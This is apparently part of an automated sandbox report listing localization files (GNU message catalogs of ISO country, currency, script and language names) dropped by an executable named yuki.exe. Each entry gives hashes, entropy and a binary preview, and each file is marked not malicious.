                                                                                                    Preview:........................................................................................................................................&...............9.......B.......J.......R.......Y......._.......g.......n.......v.......................................................................................................................................).......1.......6.......=.......L.......T.......\.......e.......n...............................................................................................................................................................$......./.......9.......@.......N.......U.......[.......d.......n.......v.......~.......................................................................................................................................................................&.......1.......<.......C.......L.......U.......Z.......`.......k.......v.......................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 183 messages, Project-Id-Version: iso_15924 'adlam'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10301
                                                                                                    Entropy (8bit):5.097444253016151
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:dsuv0JRfltU4WjV9qWxa5hW8sP0amFLIznNw2FsgGvHAqF:mOIRfg4WjVDxa5hW8ramF0DWx
                                                                                                    MD5:6EC6DA61C3753EB202E203F1B56CDAA4
                                                                                                    SHA1:D9F227B80D8C04155FA62EBD73A2E43FBA1221A6
                                                                                                    SHA-256:E3255464F59C4EFB0FB778235C1A3F8A8DC866ACE86A29CC252A296613D40897
                                                                                                    SHA-512:93322F52F4C94FD554237A65491D15A1356D7BDF386BE2B6EAEB4D0C9FF47A1574DB384AF81108D9FA889D959E28C043E1BA7ED3D1F5623C2CF2E53F35DCED02
                                                                                                    Malicious:false
                                                                                                    Preview:................................x.......y...................?...........................................................................%.......-.......7.......C.......P.......Y.......`.......h.......q.......w.......~.......................................................................................:.......B...&...K.......r...........(...........................................................'.......2.......9.......A.......G.......P.......Y.......s...........,...........................................................(.......9.......O...&...f...........4...........................................................#...............B.......V.......\.......c...#...u...............................................................................!.......'.......0.......9.......G.......L.......S.......Z.......c.......m.......................................................................................*...(...4.......].......f.......n...........-...............!...........................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 'Afganiszt\303\241n'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):24602
                                                                                                    Entropy (8bit):5.168479365948576
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:F9k3DKSosrFvX4KdGoll46nbjz5wsWP48WAINiZGWDgckQ7afREXcSsV:0oUZdpv48fmsWP48WAIEuIaZ3
                                                                                                    MD5:946E48D21265FC19DAD3E4F1B75F64CE
                                                                                                    SHA1:382943CCF47D0300AD4169C5DF1CB47B877C862D
                                                                                                    SHA-256:23A9417E48F281B8F5063D6FAF3BAE1831B800A139477BA3D62423B712CEDCF4
                                                                                                    SHA-512:6B31C78805B48BA0F124519922939566D5FEB61E8E2331207CCD766A7CF9AC3487379A06F74295BFF1ACE476B7A80EF5A956B98F82342A9B105059CCE3642859
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1604 messages, Project-Id-Version: iso_3166-2 'A'ana'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):68957
                                                                                                    Entropy (8bit):5.078206733863741
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:PwoZllAbpbQrIow/9jOFtjHxPeSCN8pPFrNy+xQ1zZEgwTVapejd0zvUhzSt:PwoWb9KRXv9NnQ1zZEgweGd0zvUhzSt
                                                                                                    MD5:D99C2EA20FE77CDD74A33A91146F6C95
                                                                                                    SHA1:08FDA156B76B61575EADBA7AC48E0FB0AEB622AC
                                                                                                    SHA-256:875CF9DFA4468D0871426C7C21F6903B65A9C5F7E3EBEC3062EBEE5ED2BA8DA1
                                                                                                    SHA-512:E688D96AB7B00827459C0663BE9ABDF918BD48EAA60F13DE5E540720A12781CD3EA58580FC8AEF65C48AC48E0CF25D4A79F2E911224EDF543C50DB8B4C08D2E6
                                                                                                    Malicious:false
                                                                                                    Preview:........D.......<2..]...\d........................................................................................".......+.......0.......:.......?.......N.......W......._.......e.......n.......t.......~..........................................................................................................................................$.......+.......8.......>.......D.......L.......V.......k.......w.............................................................................................................%......./.......9.......A.......K.......X.......b.......q...................................................................................................................................%.......+.......6.......>.......E.......L.......U.......e.......}..........................................................................................................................................(.......D.......S.......[.......l.......x...............................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 'Brit Antarktiszi Ter\303\274let'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2749
                                                                                                    Entropy (8bit):5.335044800210034
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VADmzC+R+avGqIfdvqNuoUZ5gmB90gvYO5HjIehHMu/:qDm7R+ayBolmBvY6
                                                                                                    MD5:22DCFFAA39609275694C6B07101C169A
                                                                                                    SHA1:0C3719344CDAD9DB117A9CEB27340CF12416C301
                                                                                                    SHA-256:E1F02AB756F87D2170EB7C64F23BDDC396C7C1FB067BA497C21CDF7072F0925F
                                                                                                    SHA-512:0008F31A6B444D313B9DE2FCEC1CCE115F6B66500221AF67CFF3624F39C58CDFC6D2FB3AFB89ACE5D5001E0019134E04C97E854117ECF066F9BF6A11891FF665
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...........................'.......+.............../...<.......l.......t..................................."...................$.......3.......C.......U.......s.../.......................................3...........#.......0...$...L.......q...(...}................................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 180 messages, Project-Id-Version: iso_4217 'ADB elsz\303\241mol\303\241si egys\303\251g'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9822
                                                                                                    Entropy (8bit):5.030419109002505
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:fqFkc/RxYj86VRyK0G/2LCntx8ydJhiQ3gOE90Ah/q4u5x:Sac16TL0G/Uo/l29J/qx
                                                                                                    MD5:9A8C561D8BECA7546C0B854DD1E6126A
                                                                                                    SHA1:6FED2B7488276EB48A0F62CDCBE4FBAE5CD48658
                                                                                                    SHA-256:ACB3720DB7746732A00850E781793CD847584A9A884FFB41DB4030D9702B4556
                                                                                                    SHA-512:CF9F5A859E78B7CD92947B4D99C08EA958397AF3748672ED021D472ADB8173F08A1D68C4BEF32035D8720541AF522E0D3D9D539369F64A6383C9DF51AEE1DAFE
                                                                                                    Malicious:false
                                                                                                    Preview:........................\....... .......!.......5.......=.......L.......[.......i.......w...........................................................................................1...!...3...S...9.......7...................................$.......2.......B.......Q.......[.......m.......}...........0...................................................................9.......F.......M.......Z.......`.......o.......u...............................................................................................................%.......-.......;.......I.......Z.......b.......p.......}.......................................................................................................................................(.......5.......?.......D.......T.......b.......t...........!...................................................................................1.......D.......V.......i.......r.......................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 969 messages, Project-Id-Version: iso_639-3 'abh\303\241z'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):37180
                                                                                                    Entropy (8bit):4.664404950074738
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:JD4KjBYfc65ospFPUD0iAuqDQMfj8XIcXdLl51eigZKx4:JD4aYRPChAumF89dLl51eigZKi
                                                                                                    MD5:4DEAC5D258EA7772795A69F28024EF2A
                                                                                                    SHA1:476A5F3AAD84845ABEBBF7D97DB70909426B6DB3
                                                                                                    SHA-256:9EE99863EB3EA86DA7EA3CFCC96F7880412684420117C7A7DC24276D22C1A117
                                                                                                    SHA-512:F913BCF7F7999FED69738B2EAF45E4A8C836E835AC9B6C332A152C9E645A199BD265774D315575677FDF68F5E35942CC5D4B76B686FCD5ADB1D1495341F4A164
                                                                                                    Malicious:false
                                                                                                    Preview:................d........<.......P.......P.......P.......Q.......Q.......Q.......Q.......Q......%Q....../Q......6Q......;Q......@Q......IQ......QQ......XQ......aQ......gQ......~Q.......Q.......Q.......Q.......Q.......Q.......Q.......Q.......Q.......Q.......Q.......Q.......Q.......Q.......Q.......Q.......Q.......R.......R.......R.......R...... R......'R......2R......:R......@R......IR......OR......TR......\R......hR......rR......{R.......R.......R.......R.......R.......R.......R.......R.......R.......R.......R.......R.......R.......R.......R.......R.......R.......S.......S.......S.......S......$S......-S......5S......=S......IS......VS......eS......oS......wS.......S.......S.......S.......S.......S.......S.......S.......S.......S.......S.......S.......S.......S.......S.......S.......S.......S.......T.......T.......T.......T.......T......$T......*T......3T......8T......KT......RT......ZT......bT......~T.......T.......T.......T.......T.......T.......T.......T.......T.......T.......T......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 116 messages, Project-Id-Version: iso_639-5 'afro\303\241zsiai nyelvek'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7550
                                                                                                    Entropy (8bit):4.914939749854811
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:XohhvFk/Dxi2Ti1/PRfYwORSlSE0BfCuXr5VcJHVCvoU0LQvUNt5TlE0F2dlA01S:4SDx0JQwHSE0BfNca/0LtN7imKm
                                                                                                    MD5:AD2B67475B805C2A1D93623FB4EAAA1A
                                                                                                    SHA1:EFA45C5EC211FAE45FA8B64930A9E180BA7A7502
                                                                                                    SHA-256:1A2E410CF5DCC0832040C5419A0235A40DC54A9EA5D23D76C9FAE696FF6F6DC7
                                                                                                    SHA-512:E0342A0673151F17BD3F4B1B75A6F5265DD7103471C378B94481E00A22FCE83BA8EBCA0F0834E7259E900A11665BE47FAAEFC9BF3E283810B6E5307938DD40BC
                                                                                                    Malicious:false
                                                                                                    Preview:........t...............\............................................... .......5.......F.......W.......h.......{...............................................................&.......9.......I.......Y.......i.......y...................................!.......#...................2.......C.......T.......g.......x...$.......#.......%...........................".......:...#...P.......t.......................................................................*.......8.......H.......`.......w...............................................................................7.......G.......X.......h.......|...............................................................1.......J.......[.......l...............................................................................'.......9.......P.......a.......r...............................................................(.......9.......H.......Y.......j...........................#...................................................3.......D.......S.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 408 messages, Project-Id-Version: iso_3166-1 '\324\261\326\206\325\262\325\241\325\266\325\275\325\277\325\241\325\266'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):30567
                                                                                                    Entropy (8bit):5.1452101820907625
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:eAJg2rD6AT/vudo5XvF8jM5wsOP4XLAE1i3KQuTUm7kOVa:eA6fU+dyfOgmsOP4XLAEsuAL
                                                                                                    MD5:C71F95F461505EABF09BA4C1118066E3
                                                                                                    SHA1:5A8B41F96AF8FE5006943D792018EA175AAEC496
                                                                                                    SHA-256:4A0A0A20466A3A226C7E3140566F9411B21B3BC27EE2DF8622C3468B90957427
                                                                                                    SHA-512:D75544C549B22EF96769E5677F5B847EC789AAC9C9A23E11ED9C813B96E11E50006F3612179C72BB9117AD6A4AE5CD194E3DD84B8667E17CF4F0157FA6977BAE
                                                                                                    Malicious:false
                                                                                                    Preview:....................#...........("......)"......5"......="......E"......T"......\"......c"......l"......w".......".......".......".......".......".......".......".......".......".......".......".......#.......#.......#.......#......%#......+#......3#.. ...:#......[#......c#.. ....#.......#.......#.......#.......#.......#.......#.......$......!$......*$......7$......?$......H$......Q$......X$......g$.......$.......$.......$.......$.......$.......$.......$.......$..,....$......%%......-%..%...3%......Y%......f%......q%......y%......~%.......%.......%.......%..%....%..,....%.."....%..*..."&......M&......U&......^&......g&......z&.......&.......&.......&.......&.......&.......&.......&.......&.......&..'....'..$...-'......R'......n'.......'.......'.......'.......'.......'.......'.......'.......'.......(......&(......,(......>(......E(......M(......U(......[(......e(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(..!....(.......)......-)......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 '\324\262\326\200\325\253\325\277\325\241\325\266\325\241\325\257\325\241\325\266 \324\261\325\266\325\277\325\241\326\200\325\257\325\277\325\253\325\257\325\241\325\265\325\253 \325\217\325\241\326\200\325\241\325\256\326\204'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3474
                                                                                                    Entropy (8bit):5.377783425407572
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VADWZtYvGqIfdvqNuoUtHvVNdtQpTbwU3KezuZoW0o:qDGSyBoKHvzdm5X3KezuZoW0o
                                                                                                    MD5:0E1E0FBD0C969F7CD19087639ED39DE0
                                                                                                    SHA1:BBA749941B13D5B2D2A7D336646ADB78F7C37023
                                                                                                    SHA-256:0C57ABC307445D3AEC38ACA45B93FF4A1458913E6C3DE6E1F953C73BAA09774D
                                                                                                    SHA-512:862FED36DE1BD0C3C792D42A9F503B20BD3BBC9DB15BCEF4EBA424EC00B0DA30BA839E034048829FE907CEBACF09FA9CEF5275963D05BA2817CB14B49BC5D5E2
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...................:...3...V...n...a.......3...'...n...[..........."...............(.......-...A...V...o...F.......+.......!...9.......[...+...u...........(.......[...........>...$...\...........!.......E.......r.......3...g...G...............r.......'...j........................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 139 messages, Project-Id-Version: iso_15924 'Adlam'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8085
                                                                                                    Entropy (8bit):4.938418389011439
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:Y+nMQTK8Z6pRkJl4CjiqWxa5iW8sInW4b2Eve2xoa+:B+8Z0RkX4Cjaxa5iW8sIndb3vI
                                                                                                    MD5:FFB049767053547C4AA919D16B4937E0
                                                                                                    SHA1:DEC446B1468BB6AB097C79103475160D830F0001
                                                                                                    SHA-256:D4F062572768A46773A827484854FF962E12BD549B72B756B1945FB37C3FF0B1
                                                                                                    SHA-512:7DCB4E83F1F40C129065FD9E5B928C36F447E670A2EBA18A8BA78664B9D69FE8D4DD2F355ACE512F7977244FCEB36ADC332222C02613F466E8A81AAFBCE7C566
                                                                                                    Malicious:false
                                                                                                    Preview:................t...................................?...........................6.......?.......G.......P.......V.......`.......f.......n.......z.......................................................................................................................2.......O.......V.......q.......y...&.......................(.................................../.......7.......I.......^.......i.......p.......x.......~...................................,...................$.......7.......>.......G.......X.......i...........&...............4...........!.......*.......2.......:.......C.......L.......W.......k...................#...........................................................................,.......7.......M......._.......p...........(.......................................".......)...#.......M.......X.......d.......v........................................... ................................... .......,.......9.......A.......Y.......`.......y.......................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 419 messages, Project-Id-Version: iso_3166-1 'Afghanistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23347
                                                                                                    Entropy (8bit):4.959663984840517
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:jhl7o5a/DzhbCmyQH17+iF/b/Ubjh5wsWP4XdAIzirGUwRwaCgF0AoKh8JMAT7D5:jhZfdCPQH1TF/bItmsWP4XdAIB+NAoKQ
                                                                                                    MD5:3D68B184445CBF04195C33DA06D55F9D
                                                                                                    SHA1:00AD5ABBB8954BD4E4915BE480EB21454663DB7D
                                                                                                    SHA-256:83CAEEA7AAB02CE19075606F74B5F9C0120B9F75EEB7492C3F08627330F953E6
                                                                                                    SHA-512:D58ABB3D1BF088A310FDA751A11AFAD9B97F3F0BA84F5B51F9EF3BB569AC6A6A04B92E0B3519F83C194F51D119C2D07C8981DA179391578E5C4B2E3C3CE04932
                                                                                                    Malicious:false
                                                                                                    Preview:................4...3...L........#.......#......%#......-#......5#......D#......L#......S#......\#......g#......{#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$.......$.......$......#$.. ...*$......K$......S$.. ...s$.......$.......$.......$.......$.......$.......$.......$.......%.......%......'%....../%......:%......C%......L%......S%......b%......{%.......%.......%.......%.......%.......%.......%.......%..,....%...... &......(&..%....&......T&......a&......l&......t&......y&.......&.......&.......&.......&..%....&..,....&.."....'..*...%'......P'......X'......a'......j'......}'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(..'....(..$...9(......^(......z(.......(.......(.......(.......(.......(.......(.......).......)......")......2)......N)......T)......f)......m)......u)......}).......).......).......).......).......).......).......).......).......).......).......).......).......)......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 'Territorio Antarctic Britannic'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2678
                                                                                                    Entropy (8bit):5.087303045527803
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VADgaMOZVvGqIfdvqNuoUY5czE/EuckZfySGM8CubPzMui:qDrVyBodw89fFGPQ
                                                                                                    MD5:EE781AEEBD560E1B33B9F50D7D584BFD
                                                                                                    SHA1:8B847020940047A9C5A304303B8A8257B938BA10
                                                                                                    SHA-256:AA10144B0A37C86A6250DA70BB04B332119347EF72177250DA1DDD4E324EE6E4
                                                                                                    SHA-512:AB9F7844B5E5E78BF1AD522C6D28413034EA1F8E10365D63F7E661D2B3790E6D7023C9128BC864F428CF6211384F7F37DB285DE34CECC6151934A9A6933EB77A
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c.......................K...*...j...(...............0...........................(.......6...+...K...#...w...........................................................'... .......H.......a.......u.......|...,....................... ...........#...2.../.......b........................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 183 messages, Project-Id-Version: iso_15924 'Adlam'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10195
                                                                                                    Entropy (8bit):5.039465036364493
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:dB1EWSemMrvKuoltU4WjV9qWxa5hW8rwoxyWQfFef4E+hNU+:X4rM7Kuog4WjVDxa5hW8MNW0ef4E+hN3
                                                                                                    MD5:B284263EFA094BBEB98F62B3C92C48D4
                                                                                                    SHA1:A029C8B09DB8F12CCB2AADD816610E5B2F92305E
                                                                                                    SHA-256:DCB125F7091B08B32DF6894D49DB72C9D143F529793016B6874FE095EC2614D1
                                                                                                    SHA-512:C5ADE3C6BE342F18ADBD7C7CF0BDF1D69827932F2EEA50FFC58F6D0AFEEDA6879A05A65EFFAAA515774CD4E31B5ACBE634E0E728B8D4E5A3F30763A3F13ACC7B
                                                                                                    Malicious:false
                                                                                                    Preview:................................x.......y...................?...........................................................................%.......-.......7.......C.......P.......Y.......`.......h.......q.......w.......~.......................................................................................:.......B...&...K.......r...........(...........................................................'.......2.......9.......A.......G.......P.......Y.......s...........,...........................................................(.......9.......O...&...f...........4...........................................................#...............B.......V.......\.......c...#...u...............................................................................!.......'.......0.......9.......G.......L.......S.......Z.......c.......m.......................................................................................*...(...4.......].......f.......n...........-...............!...........................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 'Afganistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23086
                                                                                                    Entropy (8bit):4.973209654525753
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:F9k3DKSosypMM/kuSIDy46nbjz5wsWP48WAINiZGKUklQm15TVGArJ:0o9j/kgDy48fmsWP48WAIcUklb5TVGAV
                                                                                                    MD5:D63C9C6305277F1EA9E4B0D6E94024FE
                                                                                                    SHA1:254E7EF74E1B1D0372BDAE436475323ADFD5E323
                                                                                                    SHA-256:D5597229F858219E37D444257578D465790380B014922569A81BBA20C4BD7114
                                                                                                    SHA-512:D3BB9E5FE90033A55EFD0B6F8D7939F513FBB924112CCD1BF31EC28CA05E4604D98B24A759257F843B1AF4DE838184ED2D0D5FEB886DF604B8267A52141F3BF6
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 3744 messages, Project-Id-Version: iso_3166-2 ''Eua'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):159848
                                                                                                    Entropy (8bit):5.260938577754068
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:VCSqFftIXmioPqGe91AlwN7uddUtN//0h+qDmSNCcdfaOu/VNB+23eu:g55k9/04qt2VNY2V
                                                                                                    MD5:B03B8991278243B245F2BAB755720901
                                                                                                    SHA1:918B08A4E158FC739FFAF77AD4BCE631574AC89B
                                                                                                    SHA-256:F0ACCF230B8604A9F4593EA5AC2785F33F06EF266EEDD0C06705CFC261BF2596
                                                                                                    SHA-512:32E5ACDC10DBDCF91E6CA6EF3B1A447A59E27AFEFB61E9F569A397AEA2F468D45140DC782D1DAD018DE7A92883B0AA818B12D3D52984208D36DF29A6DB96B2B1
                                                                                                    Malicious:false
                                                                                                    Preview:.................u.............. 8......!8......&8......,8......48......;8......I8......W8......\8......a8......j8......o8......w8.......8.......8.......8.......8.......8.......8.......8.......8.......8.......8.......8.......8.......8.......8.......9.......9...... 9....../9......@9......O9......T9......`9......f9......t9......z9.......9.......9.......9.......9.......9.......9.......9.......9.......9.......9.......9.......9.......9.......9.......9.......:.......:......":.......:......>:......I:......U:......c:......l:......x:.......:.......:.......:.......:.......:.......:.......:.......:.......:.......;.......;......!;......+;......3;......=;......J;......T;......c;......q;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......<.......<.......<.......<......$<......*<......5<......=<......D<......K<......T<......d<......|<.......<.......<.......<.......<.......<.......<.......<.......<.......<.......<.......<.......=.......=.......=......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 32 messages, Project-Id-Version: iso_3166-3 'Wilayah Antartika Inggris'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2702
                                                                                                    Entropy (8bit):5.161399687425485
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rLf3PHzYZUFz/+vGqIfdvqN5CoUCi6A+g4ly61VDdXYL:rLvMCL+yaCoXi6ng45VDJq
                                                                                                    MD5:3A5507CE84CDEC853CFF300DFCD2860A
                                                                                                    SHA1:D7C8482133CBE06F96AFD85CFE8B0427DB67F6F7
                                                                                                    SHA-256:A33C9B92D9640689285D76E47FEBAB1AF12FE37256092C433B555D6BB3BB048C
                                                                                                    SHA-512:FC5357CD7C6BBDE0F89BD010A44F9F6DB38D33F03664D4A65FE9129FEDC60DC1CD42EA349286F4321CA5D7C1D8D26F3AC50A6B21B41BEE9976DA854574CF0C2A
                                                                                                    Malicious:false
                                                                                                    Preview:........ ...........+.......................).......*...........:.../...W...........................................)...........................9.......I.......X.......m.......z...!....................................... .......)...........5... ...N.......o...2...{...+...............................!......."...................;.......[.......c.......p.......|...............................................".......3.......D.......P...'...]........................................... ...........................+... ...6...'...W................... ....................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 180 messages, Project-Id-Version: iso_4217 'ADB Unit of Account'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9513
                                                                                                    Entropy (8bit):4.93587449931399
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:fqFweHkEvHMU+Rht6VRyK0G/2LCntx/OW77xP4/mftX:S7vH/+7t6TL0G/Uo/mKxP4wB
                                                                                                    MD5:60167232C951E2EC1F35249DA320EA21
                                                                                                    SHA1:24E6AE40E43A6BE4AC401E4314374045FED21ECA
                                                                                                    SHA-256:6D96BF5804C817E2C536F021B1EAB36ED405690E9E6050A5149F515F014232C1
                                                                                                    SHA-512:1CD14F5D49ADC0A1E51E76E278584C38C77C118274E922B6E98440155B947972B4930821001688D6360D13E425BA31C07B7EA0A339A124F40935400C4D11F111
                                                                                                    Malicious:false
                                                                                                    Preview:........................\....... .......!.......5.......=.......L.......[.......i.......w...........................................................................................1...!...3...S...9.......7...................................$.......2.......B.......Q.......[.......m.......}...........0...................................................................9.......F.......M.......Z.......`.......o.......u...............................................................................................................%.......-.......;.......I.......Z.......b.......p.......}.......................................................................................................................................(.......5.......?.......D.......T.......b.......t...........!...................................................................................1.......D.......V.......i.......r.......................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 7077 messages, Project-Id-Version: Indonesian (iso-codes) ''Are'are'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):292415
                                                                                                    Entropy (8bit):5.192360893827307
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:12+d5j3BKNGbhROlAVt0yd9j6QMYIusu7gAQA:Q+zj3YOTvuQMEDQA
                                                                                                    MD5:66484C35E9FB155A42E19E5C3EE7F164
                                                                                                    SHA1:FC236C996CE69BF11E9ACA8DE88EA9D842C89236
                                                                                                    SHA-256:900A737E501D59DE2DF5E1D4AB5E6225703E1621E227628174BDD56D21B4C8B1
                                                                                                    SHA-512:0C8E7ED96B870E313DB68D37C8F91748BD063BDC20BC99F42874592EB1CB02B74EE714189235E53AB6F27FA7BEB28075D254AC53CEC6CCD82816128A1DD1259F
                                                                                                    Malicious:false
                                                                                                    Preview:................D....$..l........M.......M.......M.......M.......M.......N.......N.......N.......N.......N......(N......0N......5N......:N......@N......MN......TN......\N......cN......lN......vN.......N.......N.......N.......N.......N.......N.......N.......N.......N.......N.......N.......N.......N.......N.......N.......N.......N.......N.......O.......O......"O......1O......7O......>O......CO......TO......lO......rO......zO.......O.......O.......O.......O.......O.......O.......O.......O.......O.......O.......O.......O.......O.......O.......P.......P.......P.......P.......P...... P......%P......:P......AP......JP......TP......iP......qP......yP.......P.......P.......P.......P.......P.......P.......P.......P.......P.......P.......P.......P.......Q.......Q......#Q......0Q......@Q......PQ......^Q......sQ.......Q.......Q.......Q.......Q.......Q.......Q.......Q.......Q.......Q.......Q.......Q.......Q.......Q.......Q.......Q.......R.......R.......R.......R.......R......%R......2R......?R......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 96 messages, Project-Id-Version: iso_639-5 'Bahasa Afro-Asiatik'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6346
                                                                                                    Entropy (8bit):4.775871997475478
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:K1KkKGcwF0DLyGRGtCNDu0E0BfChrMTCX06TedVxj1x0VpuVAELb9Bm:K45nhDLyGRnNi0E0Bf92rebx0Lu5lg
                                                                                                    MD5:993D0F2E535552388CA8AA4B212CC555
                                                                                                    SHA1:4E723ACC5B0A029F92E0A2CFE211521F991E4BE5
